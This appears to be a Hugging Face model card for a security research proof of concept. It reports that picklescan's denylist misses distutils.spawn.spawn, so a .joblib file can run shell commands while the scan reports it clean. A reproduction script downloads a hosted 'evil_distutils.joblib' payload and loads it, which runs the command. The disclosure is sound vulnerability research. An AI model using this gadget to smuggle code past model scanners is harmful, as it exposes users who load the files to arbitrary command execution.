distutils.spawn.spawn โ picklescan bypass PoC (.joblib)
Security research PoC for huntr MFV submission.
Vulnerability: distutils.spawn.spawn is absent from picklescan's _unsafe_globals denylist.
A .joblib file embedding this gadget executes arbitrary shell commands while picklescan reports
issues=0, infected_files=0 (CLEAN).
Affected: picklescan โค 1.0.4 (latest), Python โค 3.11
Reproduction
pip3 install joblib picklescan
python3 -c "
import os, joblib
from huggingface_hub import hf_hub_download
path = hf_hub_download('th3-j0k3r/distutils-spawn-picklescan-bypass', 'evil_distutils.joblib')
import io
from picklescan.scanner import scan_bytes
data = open(path,'rb').read()
r = scan_bytes(io.BytesIO(data), 'evil_distutils.joblib')
print('picklescan result: issues=%d infected=%d' % (r.issues_count, r.infected_files))
joblib.load(path)
"
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐ Ask for provider support